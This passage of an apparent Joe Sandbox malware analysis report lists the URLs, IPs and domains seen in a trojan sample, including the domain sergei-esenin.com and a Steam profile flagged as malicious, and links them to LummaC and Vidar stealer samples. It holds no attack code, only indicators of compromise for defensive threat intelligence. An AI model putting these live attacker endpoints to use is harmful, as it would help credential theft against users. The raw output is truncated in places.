                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://s.ytimg.com;file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://steam.tv/file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://sketchfab.comfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://lv.queniujq.cnfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            		unknown
                                                            https://www.youtube.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.google.com/recaptcha/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://checkout.steampowered.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/;file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/about/file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://help.steampowered.com/en/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://steamcommunity.com/market/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://store.steampowered.com/news/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://community.akamai.steamstatic.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://sergei-esenin.com/apihfile.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&amp;l=efile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://store.steampowered.com/stats/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://medal.tvfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://sergei-esenin.com/G9file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTzfile.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://login.steampowered.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://store.steampowered.com/legal/file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://steambroadcast-test.akamaigBfile.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://recaptcha.netfile.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://store.steampowered.com/file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://127.0.0.1:27060file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://help.steampowered.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://api.steampowered.com/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://steamcommunity.com/file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        • URL Reputation: malware
                                                                                                        		unknown

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        104.102.49.254
                                                                                                        		steamcommunity.comUnited States
                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                        172.67.206.204
                                                                                                        		sergei-esenin.comUnited States
                                                                                                        		13335CLOUDFLARENETUStrue

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1526972
                                                                                                        Start date and time:2024-10-06 18:41:06 +02:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 4m 52s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:13
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:file.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:Failed
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • VT rate limit hit for: file.exe

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        12:42:05API Interceptor5x Sleep call for process: file.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                        172.67.206.204Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                http://app.easygoogleanalytics4.comGet hashmaliciousUnknownBrowse

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  sergei-esenin.comSetup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                                  • 172.67.206.204
                                                                                                                  Launch.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.53.8
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                  • 104.21.53.8
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  • 172.67.206.204
                                                                                                                  steamcommunity.comSetup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  msvcp110.dllGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  Launch.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUShttps://us-usps-ywwdro.xyz/update/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.16.40.28
